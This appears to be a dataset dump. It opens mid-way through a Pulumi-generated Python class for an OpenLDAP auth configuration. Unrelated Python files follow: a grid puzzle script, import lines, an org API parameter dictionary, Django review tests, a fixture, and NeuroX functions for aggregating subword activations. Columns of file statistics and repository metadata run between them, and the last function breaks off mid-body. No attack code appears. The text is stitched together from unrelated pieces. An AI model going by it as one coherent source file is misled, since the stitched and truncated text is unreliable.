:param pulumi.Input[str] user_member_attribute: User member attribute. Default `memberOf` (string)
:param pulumi.Input[str] user_name_attribute: User name attribute. Default `givenName` (string)
:param pulumi.Input[str] user_object_class: User object class. Default `inetorgperson` (string)
:param pulumi.Input[str] user_search_attribute: User search attribute. Default `uid|sn|givenName` (string)
:param pulumi.Input[str] user_search_base: User search base DN (string)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AuthConfigOpenLdapState.__new__(_AuthConfigOpenLdapState)
__props__.__dict__["access_mode"] = access_mode
__props__.__dict__["allowed_principal_ids"] = allowed_principal_ids
__props__.__dict__["annotations"] = annotations
__props__.__dict__["certificate"] = certificate
__props__.__dict__["connection_timeout"] = connection_timeout
__props__.__dict__["enabled"] = enabled
__props__.__dict__["group_dn_attribute"] = group_dn_attribute
__props__.__dict__["group_member_mapping_attribute"] = group_member_mapping_attribute
__props__.__dict__["group_member_user_attribute"] = group_member_user_attribute
__props__.__dict__["group_name_attribute"] = group_name_attribute
__props__.__dict__["group_object_class"] = group_object_class
__props__.__dict__["group_search_attribute"] = group_search_attribute
__props__.__dict__["group_search_base"] = group_search_base
__props__.__dict__["labels"] = labels
__props__.__dict__["name"] = name
__props__.__dict__["nested_group_membership_enabled"] = nested_group_membership_enabled
__props__.__dict__["port"] = port
__props__.__dict__["servers"] = servers
__props__.__dict__["service_account_distinguished_name"] = service_account_distinguished_name
__props__.__dict__["service_account_password"] = service_account_password
__props__.__dict__["test_password"] = test_password
__props__.__dict__["test_username"] = test_username
__props__.__dict__["tls"] = tls
__props__.__dict__["type"] = type
__props__.__dict__["user_disabled_bit_mask"] = user_disabled_bit_mask
__props__.__dict__["user_enabled_attribute"] = user_enabled_attribute
__props__.__dict__["user_login_attribute"] = user_login_attribute
__props__.__dict__["user_member_attribute"] = user_member_attribute
__props__.__dict__["user_name_attribute"] = user_name_attribute
__props__.__dict__["user_object_class"] = user_object_class
__props__.__dict__["user_search_attribute"] = user_search_attribute
__props__.__dict__["user_search_base"] = user_search_base
return AuthConfigOpenLdap(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accessMode")
def access_mode(self) -> pulumi.Output[Optional[str]]:
"""
Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
"""
return pulumi.get(self, "access_mode")
@property
@pulumi.getter(name="allowedPrincipalIds")
def allowed_principal_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
"""
return pulumi.get(self, "allowed_principal_ids")
@property
@pulumi.getter
def annotations(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Annotations of the resource (map)
"""
return pulumi.get(self, "annotations")
@property
@pulumi.getter
def certificate(self) -> pulumi.Output[Optional[str]]:
"""
Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
"""
return pulumi.get(self, "certificate")
@property
@pulumi.getter(name="connectionTimeout")
def connection_timeout(self) -> pulumi.Output[Optional[int]]:
"""
OpenLdap connection timeout. Default `5000` (int)
"""
return pulumi.get(self, "connection_timeout")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Enable auth config provider. Default `true` (bool)
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="groupDnAttribute")
def group_dn_attribute(self) -> pulumi.Output[str]:
"""
Group DN attribute. Default `entryDN` (string)
"""
return pulumi.get(self, "group_dn_attribute")
@property
@pulumi.getter(name="groupMemberMappingAttribute")
def group_member_mapping_attribute(self) -> pulumi.Output[str]:
"""
Group member mapping attribute. Default `member` (string)
"""
return pulumi.get(self, "group_member_mapping_attribute")
@property
@pulumi.getter(name="groupMemberUserAttribute")
def group_member_user_attribute(self) -> pulumi.Output[str]:
"""
Group member user attribute. Default `entryDN` (string)
"""
return pulumi.get(self, "group_member_user_attribute")
@property
@pulumi.getter(name="groupNameAttribute")
def group_name_attribute(self) -> pulumi.Output[str]:
"""
Group name attribute. Default `cn` (string)
"""
return pulumi.get(self, "group_name_attribute")
@property
@pulumi.getter(name="groupObjectClass")
def group_object_class(self) -> pulumi.Output[str]:
"""
Group object class. Default `groupOfNames` (string)
"""
return pulumi.get(self, "group_object_class")
@property
@pulumi.getter(name="groupSearchAttribute")
def group_search_attribute(self) -> pulumi.Output[str]:
"""
Group search attribute. Default `cn` (string)
"""
return pulumi.get(self, "group_search_attribute")
@property
@pulumi.getter(name="groupSearchBase")
def group_search_base(self) -> pulumi.Output[str]:
"""
Group search base (string)
"""
return pulumi.get(self, "group_search_base")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Labels of the resource (map)
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
(Computed) The name of the resource (string)
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nestedGroupMembershipEnabled")
def nested_group_membership_enabled(self) -> pulumi.Output[bool]:
"""
Nested group membership enable. Default `false` (bool)
"""
return pulumi.get(self, "nested_group_membership_enabled")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[int]]:
"""
OpenLdap port. Default `389` (int)
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def servers(self) -> pulumi.Output[Sequence[str]]:
"""
OpenLdap servers list (list)
"""
return pulumi.get(self, "servers")
@property
@pulumi.getter(name="serviceAccountDistinguishedName")
def service_account_distinguished_name(self) -> pulumi.Output[str]:
"""
Service account DN for access OpenLdap service (string)
"""
return pulumi.get(self, "service_account_distinguished_name")
@property
@pulumi.getter(name="serviceAccountPassword")
def service_account_password(self) -> pulumi.Output[str]:
"""
Service account password for access OpenLdap service (string)
"""
return pulumi.get(self, "service_account_password")
@property
@pulumi.getter(name="testPassword")
def test_password(self) -> pulumi.Output[str]:
"""
Password for test access to OpenLdap service (string)
"""
return pulumi.get(self, "test_password")
@property
@pulumi.getter(name="testUsername")
def test_username(self) -> pulumi.Output[str]:
"""
Username for test access to OpenLdap service (string)
"""
return pulumi.get(self, "test_username")
@property
@pulumi.getter
def tls(self) -> pulumi.Output[bool]:
"""
Enable TLS connection (bool)
"""
return pulumi.get(self, "tls")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
(Computed) The type of the resource (string)
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userDisabledBitMask")
def user_disabled_bit_mask(self) -> pulumi.Output[int]:
"""
User disabled bit mask (int)
"""
return pulumi.get(self, "user_disabled_bit_mask")
@property
@pulumi.getter(name="userEnabledAttribute")
def user_enabled_attribute(self) -> pulumi.Output[str]:
"""
User enable attribute (string)
"""
return pulumi.get(self, "user_enabled_attribute")
@property
@pulumi.getter(name="userLoginAttribute")
def user_login_attribute(self) -> pulumi.Output[str]:
"""
User login attribute. Default `uid` (string)
"""
return pulumi.get(self, "user_login_attribute")
@property
@pulumi.getter(name="userMemberAttribute")
def user_member_attribute(self) -> pulumi.Output[str]:
"""
User member attribute. Default `memberOf` (string)
"""
return pulumi.get(self, "user_member_attribute")
@property
@pulumi.getter(name="userNameAttribute")
def user_name_attribute(self) -> pulumi.Output[str]:
"""
User name attribute. Default `givenName` (string)
"""
return pulumi.get(self, "user_name_attribute")
@property
@pulumi.getter(name="userObjectClass")
def user_object_class(self) -> pulumi.Output[str]:
"""
User object class. Default `inetorgperson` (string)
"""
return pulumi.get(self, "user_object_class")
@property
@pulumi.getter(name="userSearchAttribute")
def user_search_attribute(self) -> pulumi.Output[str]:
"""
User search attribute. Default `uid|sn|givenName` (string)
"""
return pulumi.get(self, "user_search_attribute")
@property
@pulumi.getter(name="userSearchBase")
def user_search_base(self) -> pulumi.Output[str]:
"""
User search base DN (string)
"""
return pulumi.get(self, "user_search_base")
| 47.251744
| 227
| 0.668138
| 8,534
| 74,516
| 5.553668
| 0.027185
| 0.100264
| 0.088617
| 0.080304
| 0.958561
| 0.951535
| 0.937525
| 0.926849
| 0.918177
| 0.911594
| 0
| 0.001433
| 0.222516
| 74,516
| 1,576
| 228
| 47.281726
| 0.816639
| 0.251369
| 0
| 0.857291
| 1
| 0
| 0.125706
| 0.057359
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168563
| false
| 0.056877
| 0.005171
| 0
| 0.275078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
6cb14ca24710d5a32a25624affaf5fd44f64eda5
| 1,011
|
py
|
Python
|
monitoria-ilp/prova5/M7.py
|
gustavo-mendel/my-college-projects
|
ccc1285e1a6863312e275f973e728de231a9458a
|
[
"MIT"
] | 3
|
2021-08-18T01:59:50.000Z
|
2021-08-28T00:19:07.000Z
|
monitoria-ilp/prova5/M7.py
|
gustavo-mendel/my-college-projects
|
ccc1285e1a6863312e275f973e728de231a9458a
|
[
"MIT"
] | 4
|
2021-03-09T18:39:47.000Z
|
2021-03-26T00:01:56.000Z
|
monitoria-ilp/prova5/M7.py
|
gustavo-mendel/my-college-projects
|
ccc1285e1a6863312e275f973e728de231a9458a
|
[
"MIT"
] | 1
|
2022-03-20T14:54:09.000Z
|
2022-03-20T14:54:09.000Z
|
n, m = [int(e) for e in input().split()]
mat = []
for i in range(n):
j = [int(e) for e in input().split()]
mat.append(j)
for i in range(n):
for j in range(m):
if mat[i][j] == 0:
if i == 0:
if mat[i][j+1] == 1 and mat[i][j-1] == 1 and mat[i+1][j] == 1:
print(i, j)
exit()
if j == 0:
if mat[i+1][j] == 1 and mat[i-1][j] == 1 and mat[i][j+1] == 1:
print(i, j)
exit()
if i == n-1:
if mat[i][j+1] == 1 and mat[i][j-1] == 1 and mat[i-1][j] == 1:
print(i, j)
exit()
if j == m-1:
if mat[i+1][j] == 1 and mat[i-1][j] == 1 and mat[i][j-1] == 1:
print(i, j)
exit()
if mat[i+1][j] == 1 and mat[i-1][j] == 1 and mat[i][j+1] == 1 and mat[i][j-1] == 1:
print(i, j)
exit()
print(0, 0)
| 29.735294
| 95
| 0.331355
| 174
| 1,011
| 1.925287
| 0.109195
| 0.202985
| 0.229851
| 0.262687
| 0.859701
| 0.78806
| 0.78806
| 0.78806
| 0.650746
| 0.650746
| 0
| 0.072626
| 0.468843
| 1,011
| 33
| 96
| 30.636364
| 0.55121
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9f4610a7e6a629e7a9bdcd73d7e9be93fc1f7fd1
| 121
|
py
|
Python
|
finitewave/core/command/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
finitewave/core/command/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
finitewave/core/command/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
from finitewave.core.command.command import Command
from finitewave.core.command.command_sequence import CommandSequence
| 40.333333
| 68
| 0.884298
| 15
| 121
| 7.066667
| 0.466667
| 0.264151
| 0.339623
| 0.471698
| 0.603774
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066116
| 121
| 2
| 69
| 60.5
| 0.938053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9f7a4be8ce759b7e547712d816275d3d49b73d19
| 3,450
|
py
|
Python
|
engine/db/org/db_org_parameter.py
|
datapunk2078/torro_community
|
97a97c9d089b0a7b47ccdc28e4e077da36d4b85c
|
[
"MIT"
] | null | null | null |
engine/db/org/db_org_parameter.py
|
datapunk2078/torro_community
|
97a97c9d089b0a7b47ccdc28e4e077da36d4b85c
|
[
"MIT"
] | null | null | null |
engine/db/org/db_org_parameter.py
|
datapunk2078/torro_community
|
97a97c9d089b0a7b47ccdc28e4e077da36d4b85c
|
[
"MIT"
] | null | null | null |
class orgApiPara:
setOrg_POST_request = {"host": {"type": str, "default": ''},
"port": {"type": int, "default": 636},
"cer_path": {"type": str, "default": ''},
"use_sll": {"type": bool, "default": True},
"admin": {"type": str, "default": ''},
"admin_pwd": {"type": str, "default": ''},
"admin_group": {"type": str, "default": ''},
"base_group": {"type": str, "default": ''},
"org_name": {"type": str, "default": ''},
"des": {"type": str, "default": ''},
"search_base": {"type": str, "default": ''}},
updateOrg_POST_request = {"id": {"type": int, "default": -1},
"host": {"type": str, "default": ''},
"port": {"type": int, "default": 636},
"cer_path": {"type": str, "default": ''},
"use_sll": {"type": bool, "default": True},
"admin": {"type": str, "default": ''},
"admin_pwd": {"type": str, "default": ''},
"admin_group": {"type": str, "default": ''},
"base_group": {"type": str, "default": ''},
"org_name": {"type": str, "default": ''},
"des": {"type": str, "default": ''},
"search_base": {"type": str, "default": ''}},
setOrg_POST_response = {
"ldap_id": {"type": int, "default": -1},
"org_id": {"type": int, "default": -1},
"host": {"type": str, "default": ''},
"port": {"type": int, "default": 636},
"cer_path": {"type": str, "default": ''},
"use_sll": {"type": bool, "default": True},
"admin": {"type": str, "default": ''},
"admin_pwd": {"type": str, "default": ''},
"admin_group": {"type": str, "default": ''},
"base_group": {"type": str, "default": ''},
"org_name": {"type": str, "default": ''},
"des": {"type": str, "default": ''},
"search_base": {"type": str, "default": ''}}
updateOrg_POST_response = {
"ldap_id": {"type": int, "default": -1},
"org_id": {"type": int, "default": -1},
"host": {"type": str, "default": ''},
"port": {"type": int, "default": 636},
"use_sll": {"type": bool, "default": True},
"cer_path": {"type": str, "default": ''},
"admin": {"type": str, "default": ''},
"admin_pwd": {"type": str, "default": ''},
"admin_group": {"type": str, "default": ''},
"base_group": {"type": str, "default": ''},
"org_name": {"type": str, "default": ''},
"des": {"type": str, "default": ''},
"search_base": {"type": str, "default": ''}}
| 60.526316
| 72
| 0.33913
| 255
| 3,450
| 4.431373
| 0.121569
| 0.223009
| 0.446018
| 0.151327
| 0.960177
| 0.941593
| 0.919469
| 0.919469
| 0.919469
| 0.919469
| 0
| 0.008971
| 0.450725
| 3,450
| 57
| 73
| 60.526316
| 0.587335
| 0
| 0
| 0.903846
| 0
| 0
| 0.257101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0.096154
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9f986ec10f3e78183b662ab2929af55d8a60b9a2
| 3,671
|
py
|
Python
|
opentech/apply/review/tests/test_models.py
|
JakabGy/hypha
|
32634080ba1cb369f07f27f6616041e4eca8dbf2
|
[
"BSD-3-Clause"
] | null | null | null |
opentech/apply/review/tests/test_models.py
|
JakabGy/hypha
|
32634080ba1cb369f07f27f6616041e4eca8dbf2
|
[
"BSD-3-Clause"
] | null | null | null |
opentech/apply/review/tests/test_models.py
|
JakabGy/hypha
|
32634080ba1cb369f07f27f6616041e4eca8dbf2
|
[
"BSD-3-Clause"
] | null | null | null |
from django.test import TestCase
from opentech.apply.funds.tests.factories import ApplicationSubmissionFactory
from .factories import ReviewFactory, ReviewOpinionFactory
from ..options import MAYBE, NO, YES
class TestReviewQueryset(TestCase):
def test_reviews_yes(self):
submission = ApplicationSubmissionFactory()
ReviewFactory(recommendation_yes=True, submission=submission)
ReviewFactory(recommendation_yes=True, submission=submission)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, YES)
def test_reviews_no(self):
submission = ApplicationSubmissionFactory()
ReviewFactory(submission=submission)
ReviewFactory(submission=submission)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, NO)
def test_reviews_maybe(self):
submission = ApplicationSubmissionFactory()
ReviewFactory(recommendation_maybe=True, submission=submission)
ReviewFactory(recommendation_maybe=True, submission=submission)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, MAYBE)
def test_reviews_mixed(self):
submission = ApplicationSubmissionFactory()
ReviewFactory(recommendation_yes=True, submission=submission)
ReviewFactory(submission=submission)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, MAYBE)
def test_review_yes_opinion_agree(self):
submission = ApplicationSubmissionFactory()
review = ReviewFactory(recommendation_yes=True, submission=submission)
ReviewOpinionFactory(review=review, opinion_agree=True)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, YES)
def test_review_yes_opinion_disagree(self):
submission = ApplicationSubmissionFactory()
review = ReviewFactory(recommendation_yes=True, submission=submission)
ReviewOpinionFactory(review=review, opinion_disagree=True)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, MAYBE)
def test_review_no_opinion_agree(self):
submission = ApplicationSubmissionFactory()
review = ReviewFactory(submission=submission)
ReviewOpinionFactory(review=review, opinion_agree=True)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, NO)
def test_review_no_opinion_disagree(self):
submission = ApplicationSubmissionFactory()
review = ReviewFactory(submission=submission)
ReviewOpinionFactory(review=review, opinion_disagree=True)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, MAYBE)
def test_review_not_all_opinion(self):
submission = ApplicationSubmissionFactory()
ReviewFactory(recommendation_yes=True, submission=submission)
review = ReviewFactory(recommendation_yes=True, submission=submission)
ReviewOpinionFactory(review=review, opinion_agree=True)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, YES)
def test_review_yes_mixed_opinion(self):
submission = ApplicationSubmissionFactory()
review = ReviewFactory(submission=submission)
ReviewOpinionFactory(review=review, opinion_agree=True)
ReviewOpinionFactory(review=review, opinion_disagree=True)
recommendation = submission.reviews.recommendation()
self.assertEqual(recommendation, MAYBE)
| 45.8875
| 78
| 0.752928
| 309
| 3,671
| 8.789644
| 0.106796
| 0.110457
| 0.154639
| 0.165685
| 0.875552
| 0.855302
| 0.816642
| 0.79676
| 0.79676
| 0.761414
| 0
| 0
| 0.174067
| 3,671
| 79
| 79
| 46.468354
| 0.895778
| 0
| 0
| 0.776119
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149254
| 1
| 0.149254
| false
| 0
| 0.059701
| 0
| 0.223881
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4c90072340fcbafd34ed47f1674ba9b82fd3e4b6
| 121
|
py
|
Python
|
src/daipecore/decorator/tests/notebook_function_fixture.py
|
daipe-ai/daipe-core
|
aa205495fa6b464fa6078d17e439c60345ac99ea
|
[
"MIT"
] | 1
|
2021-09-17T09:07:09.000Z
|
2021-09-17T09:07:09.000Z
|
src/daipecore/decorator/tests/notebook_function_fixture.py
|
daipe-ai/daipe-core
|
aa205495fa6b464fa6078d17e439c60345ac99ea
|
[
"MIT"
] | 2
|
2021-12-20T07:46:33.000Z
|
2022-02-24T07:02:05.000Z
|
src/daipecore/decorator/tests/notebook_function_fixture.py
|
daipe-ai/daipe-core
|
aa205495fa6b464fa6078d17e439c60345ac99ea
|
[
"MIT"
] | null | null | null |
from daipecore.decorator.notebook_function import notebook_function
@notebook_function
def load_data():
return 155
| 17.285714
| 67
| 0.826446
| 15
| 121
| 6.4
| 0.733333
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028302
| 0.123967
| 121
| 6
| 68
| 20.166667
| 0.877358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
4cb2cdedd09079e23a93411498c4e4df1b5bb2ca
| 11,770
|
py
|
Python
|
neurox/data/representations.py
|
qcri/NeuroX
|
a56528231f6514412f3703af48effce1404cb069
|
[
"BSD-3-Clause"
] | 87
|
2018-12-12T11:58:21.000Z
|
2022-03-26T19:19:46.000Z
|
neurox/data/representations.py
|
qcri/NeuroX
|
a56528231f6514412f3703af48effce1404cb069
|
[
"BSD-3-Clause"
] | 16
|
2019-07-08T23:45:18.000Z
|
2022-03-30T14:46:40.000Z
|
neurox/data/representations.py
|
qcri/NeuroX
|
a56528231f6514412f3703af48effce1404cb069
|
[
"BSD-3-Clause"
] | 15
|
2019-02-12T08:52:35.000Z
|
2022-03-15T13:13:32.000Z
|
"""Utility functions to manage representations.
This module contains functions that will help in managing extracted
representations, specifically on sub-word based data.
"""
import numpy as np
from tqdm import tqdm
def bpe_get_avg_activations(tokens, activations):
"""Aggregates activations by averaging assuming BPE-based tokenization.
Given loaded tokens data and activations, this function aggeregates
activations based on tokenized text. BPE based tokenization is assumed,
with every non-terminal subword ending with "@@". The activations are
aggregated by averaging over subwords.
.. warning::
This function is deprecated and will be removed in future versions.
Parameters
----------
tokens : dict
Dictionary containing three lists, ``source``, ``source_aux`` and
``target``. Usually the output of ``data.loader.load_aux_data``.
activations : list of numpy.ndarray
Activations returned from ``loader.load_activations``.
Returns
-------
activations : list of numpy.ndarray
Subword aggregated activations corresponding to one per actual token
found in the untokenized text.
"""
all_activations = []
num_neurons = activations[0].size(1)
for i in range(0, len(tokens["source_aux"])):
sourceIndex = 0
thisBPE = ""
source = tokens["source"][i]
source_aux = tokens["source_aux"][i]
num_words = len(source)
new_activations = np.zeros((num_words, num_neurons))
word_boundaries = []
for j in range(0, len(tokens["source_aux"][i])):
currSourceWord = tokens["source"][i][sourceIndex]
thisBPE = thisBPE + tokens["source_aux"][i][j]
if thisBPE != currSourceWord:
thisBPE = thisBPE[:-2]
else:
word_boundaries.append(j)
sourceIndex = sourceIndex + 1
thisBPE = ""
assert len(word_boundaries) == num_words
prev_idx = 0
for word_idx, boundary in enumerate(word_boundaries):
avg_vector = np.average(activations[i][prev_idx : boundary + 1, :], axis=0)
new_activations[word_idx, :] = avg_vector
prev_idx = boundary + 1
all_activations.append(new_activations)
return all_activations
def bpe_get_last_activations(tokens, activations, is_brnn=True):
"""Aggregates activations by picking the last subword assuming BPE-based tokenization.
Given loaded tokens data and activations, this function aggeregates
activations based on tokenized text. BPE based tokenization is assumed,
with every non-terminal subword ending with "@@". The activations are
aggregated by picking the last subword for any given word.
.. warning::
This function is deprecated and will be removed in future versions.
Parameters
----------
tokens : dict
Dictionary containing three lists, ``source``, ``source_aux`` and
``target``. Usually the output of ``data.loader.load_aux_data``.
activations : list of numpy.ndarray
Activations returned from ``loader.load_activations``.
is_brnn : bool, optional
Whether the model from which activations were extracted was bidirectional.
Only applies for RNN models.
Returns
-------
activations : list of numpy.ndarray
Subword aggregated activations corresponding to one per actual token
found in the untokenized text.
"""
all_activations = []
num_neurons = activations[0].size(1)
for i in range(0, len(tokens["source_aux"])):
sourceIndex = 0
thisBPE = ""
source = tokens["source"][i]
source_aux = tokens["source_aux"][i]
num_words = len(source)
new_activations = np.zeros((num_words, num_neurons))
word_boundaries = []
for j in range(0, len(tokens["source_aux"][i])):
currSourceWord = tokens["source"][i][sourceIndex]
thisBPE = thisBPE + tokens["source_aux"][i][j]
if thisBPE != currSourceWord:
thisBPE = thisBPE[:-2]
else:
word_boundaries.append(j)
sourceIndex = sourceIndex + 1
thisBPE = ""
assert len(word_boundaries) == num_words
rnn_boundary = int(num_neurons / 2)
if not is_brnn:
rnn_boundary = num_neurons
prev_idx = 0
for word_idx, boundary in enumerate(word_boundaries):
# 0 - num_neurons/2: Forward
# num_neurons/2 - : Backward
new_activations[word_idx, :rnn_boundary] = activations[i][
boundary, :rnn_boundary
]
if is_brnn:
new_activations[word_idx, rnn_boundary:] = activations[i][
prev_idx, rnn_boundary:
]
prev_idx = boundary + 1
all_activations.append(new_activations)
return all_activations
def char_get_avg_activations(tokens, activations):
"""Aggregates activations by averaging assuming Character-based tokenization.
Given loaded tokens data and activations, this function aggeregates
activations based on character-tokenized text. The activations are
aggregated by averaging over characters.
.. warning::
This function is deprecated and will be removed in future versions.
Parameters
----------
tokens : dict
Dictionary containing three lists, ``source``, ``source_aux`` and
``target``. Usually the output of ``data.loader.load_aux_data``.
activations : list of numpy.ndarray
Activations returned from ``loader.load_activations``.
Returns
-------
activations : list of numpy.ndarray
Character aggregated activations corresponding to one per actual token
found in the untokenized text.
"""
all_activations = []
num_neurons = activations[0].size(1)
for i in tqdm(range(0, len(tokens["source_aux"]))):
sourceIndex = 0
thisChar = ""
source = tokens["source"][i]
source_aux = tokens["source_aux"][i]
num_words = len(source)
new_activations = np.zeros((num_words, num_neurons))
word_boundaries = []
for word_idx, word in enumerate(tokens["source"][i]):
if word_idx == 0:
word_boundaries.append(len(word) - 1)
else:
word_boundaries.append(len(word) + 1 + word_boundaries[-1])
if len(word_boundaries) != num_words:
print(i, len(word_boundaries), num_words)
assert len(word_boundaries) == num_words
assert (
tokens["source_aux"][i].count("_") + 1 - tokens["source"][i].count("_")
== num_words
), (
"Number of words dont match! (line: %d, source: %d, aux: %d)\n%s\n%s"
% (
i + 1,
num_words,
tokens["source_aux"][i].count("_") + 1,
" ".join(tokens["source"][i]),
" ".join(tokens["source_aux"][i]),
)
)
prev_idx = 0
for word_idx, boundary in enumerate(word_boundaries):
avg_vector = np.average(activations[i][prev_idx : boundary + 1, :], axis=0)
new_activations[word_idx, :] = avg_vector
prev_idx = boundary + 2
all_activations.append(new_activations)
return all_activations
def char_get_last_activations(tokens, activations, is_brnn=True):
"""Aggregates activations by picking the last subword assuming Character-based tokenization.
Given loaded tokens data and activations, this function aggeregates
activations based on character-tokenized text. The activations are
aggregated by picking the last character for any given word.
.. warning::
This function is deprecated and will be removed in future versions.
Parameters
----------
tokens : dict
Dictionary containing three lists, ``source``, ``source_aux`` and
``target``. Usually the output of ``data.loader.load_aux_data``.
activations : list of numpy.ndarray
Activations returned from ``loader.load_activations``.
is_brnn : bool, optional
Whether the model from which activations were extracted was bidirectional.
Only applies for RNN models.
Returns
-------
activations : list of numpy.ndarray
Character aggregated activations corresponding to one per actual token
found in the untokenized text.
"""
all_activations = []
num_neurons = activations[0].size(1)
for i in tqdm(range(0, len(tokens["source_aux"]))):
sourceIndex = 0
thisChar = ""
source = tokens["source"][i]
source_aux = tokens["source_aux"][i]
num_words = len(source)
new_activations = np.zeros((num_words, num_neurons))
word_boundaries = []
for word_idx, word in enumerate(tokens["source"][i]):
if word_idx == 0:
word_boundaries.append(len(word) - 1)
else:
word_boundaries.append(len(word) + 1 + word_boundaries[-1])
if len(word_boundaries) != num_words:
print(i, len(word_boundaries), num_words)
assert len(word_boundaries) == num_words
assert (
tokens["source_aux"][i].count("_") + 1 - tokens["source"][i].count("_")
== num_words
), (
"Number of words dont match! (line: %d, source: %d, aux: %d)\n%s\n%s"
% (
i + 1,
num_words,
tokens["source_aux"][i].count("_") + 1,
" ".join(tokens["source"][i]),
" ".join(tokens["source_aux"][i]),
)
)
rnn_boundary = int(num_neurons / 2)
if not is_brnn:
rnn_boundary = num_neurons
prev_idx = 0
for word_idx, boundary in enumerate(word_boundaries):
# 0 - num_neurons/2: Forward
# num_neurons/2 - : Backward
new_activations[word_idx, :rnn_boundary] = activations[i][
boundary, :rnn_boundary
]
if is_brnn:
new_activations[word_idx, rnn_boundary:] = activations[i][
prev_idx, rnn_boundary:
]
prev_idx = boundary + 1
all_activations.append(new_activations)
return all_activations
def sent_get_last_activations(tokens, activations):
"""Gets the summary vector for the input sentences.
Given loaded tokens data and activations, this function picks the final token's
activations for every sentence, essentially giving summary vectors for every
sentence in the dataset. This is mostly applicable for RNNs.
.. note::
Bidirectionality is currently not handled in the case of BiRNNs.
Parameters
----------
tokens : dict
Dictionary containing three lists, ``source``, ``source_aux`` and
``target``. Usually the output of ``data.loader.load_aux_data``.
activations : list of numpy.ndarray
Activations returned from ``loader.load_activations``.
Returns
-------
activations : list of numpy.ndarray
Summary activations corresponding to one per actual sentence in the
original text.
"""
all_activations = []
num_neurons = activations[0].size(1)
for i in tqdm(range(0, len(tokens["source"]))):
source = tokens["source"][i]
num_words = len(source)
new_activations = np.zeros((1, num_neurons))
new_activations[0, :] = activations[i][-1, :]
